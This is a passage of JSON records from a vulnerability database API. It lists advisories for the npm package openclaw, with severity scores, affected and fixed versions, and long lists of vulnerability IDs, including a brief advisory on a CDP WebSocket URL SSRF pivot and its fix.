                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.23",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"
                }
            ],
            "aliases": [
                "CVE-2026-35660",
                "GHSA-wq58-2pvg-5h4f"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wut7-y72y-9ucb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89666?format=api",
            "vulnerability_id": "VCID-wyce-qxau-mqff",
            "summary": "OpenClaw: CDP /json/version WebSocket URL could pivot to untrusted second-hop targets\n## Summary\n\nCDP /json/version WebSocket URL could pivot to untrusted second-hop targets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.5`\n- Patched versions: `>= 2026.4.5`\n\n## Impact\n\nA browser profile could trust a CDP `/json/version` response whose `webSocketDebuggerUrl` pointed at a different host, enabling a second-hop SSRF-style pivot.\n\n## Technical Details\n\nThe fix normalizes and re-validates direct CDP WebSocket targets before connecting.\n\n## Fix\n\nThe issue was fixed in #60469. The first stable tag containing the fix is `v2026.4.5`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `bc356cc8c2beaa747c71dd86cceab8f804699665`\n- PR: #60469\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.5 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43576",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10189",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10209",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11778",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43576"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/60469",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/60469"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43576",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43576"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f7fh-qg34-x2xh",
                    "reference_id": "GHSA-f7fh-qg34-x2xh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f7fh-qg34-x2xh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-x1qe-u363-qqaa"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
